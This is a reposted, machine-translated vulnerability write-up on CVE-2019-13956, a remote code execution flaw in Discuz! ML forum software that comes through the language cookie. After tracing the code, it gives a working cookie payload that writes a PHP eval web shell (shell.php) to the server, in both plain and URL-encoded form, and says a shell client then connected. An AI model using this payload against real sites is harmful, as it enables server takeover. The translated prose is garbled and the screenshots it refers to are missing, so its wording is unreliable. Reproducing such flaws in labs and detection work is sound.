Discuz! ML remote code execution (CVE-2019-13956)

Others 2019-08-24 17:08:56 views: null

Discuz! ML remote code execution (CVE-2019-13956)

First, Vulnerability Description

The vulnerability exists discuz ml (multi-language version) in, language controllable cookie, and there is no strict filtering, can lead to remote code execution.

Second, the flaw affects versions

Discuz! ML V3.2

Discuz! ML V3.3

Discuz! ML V3.4

Third, the vulnerability environment to build

1, download the official Discuz ML V3.4, Download:! Http://discuz.ml/download

2, unpack the archive to phpstudy web root directory browser to access the upload to begin the installation

  

3, then the next step is to keep clicking on it, until the installation is complete

  

Fourth, the vulnerability reproduction

1, loopholes position /upload/source/module/portal/portal_index.php, using the template function processing 'diy: portal / index', then include_once comprising

  

2, follow up template function was found to DISCUZ_LANG stitching function as a cache file name, and then returned to the cache file name

  

3, follow DISCUZ_LANG function, language Found taken from the cookie to $ LNG

  

4, continue to browse the code, find the value of $ lng assigned to the DISCUZ_LANG

  

5, at this point, the entire vulnerability analysis process has ended, the process is as follows:

External parameters $ lng (ie the cookie language language) controllable, resulting in DISCUZ_LANG function gets $ lng, and then spliced ​​into the cache file and returns the file name cache, resulting in template function generates the cache file name controllable, insert their own code, the final include_once function contains what leads to code injection (performed to insert malicious code cache file name).

6, vulnerability testing, just click on a page, capture, will xxx_language Cookie parameter value was changed to '.phpinfo ().', Found that the successful implementation of the Code

  

7, view the cache files, found the cache file name is modified as follows

  

8、getshell

8.1 try to upload a shell, constructed payload, as follows:

'.file_put_contents('shell.php','<?php eval($_POST[cmd]);?>').'

The implementation of an error, the cause may be encoded

  

8.2, try to be all payload encoding, failure, success can only use the following payload

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2550%254f%2553%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27

  

8.3 to see if successfully uploaded shell.php, found successfully uploaded

  

8.4, chopper connected

  

 

 

 

----------------------------------------------------------------------------------------

Detection tools: https: //github.com/theLSA/discuz-ml-rce

Reference: https://mp.weixin.qq.com/s?__biz=MzU2NDc2NDYwMA==&mid=2247483944&idx=1&sn=ba9f6f99967e31fd56634f714d8ae650&scene=21#wechat_redirect

Guess you like

Origin www.cnblogs.com/yuzly/p/11386755.html
Recommended
Ranking
iframe let subpages parent page jump parent.location.href
Android Studio connects to Tomcat server in Springboot Failed to connect to XXX
Introduction to the use of Axure components, login interface and drawing of personal resume
Unreal Engine UE problem collection (continuously added)
day72 importlib module
IntelliJ ideaIC / ideaIU download and activation crack
Typescript 静态属性&方法 多态 抽象类
TestNg use annotations
FiscoBcos uses Go to call contracts
Binary-thirds Find
Daily
More
2024-07-30(0)
2024-07-29(0)
2024-07-28(0)
2024-07-27(0)
2024-07-26(0)
2024-07-25(0)
2024-07-24(0)
2024-07-23(0)
2024-07-22(0)
2024-07-21(0)

Code World

© 2018 codetd.com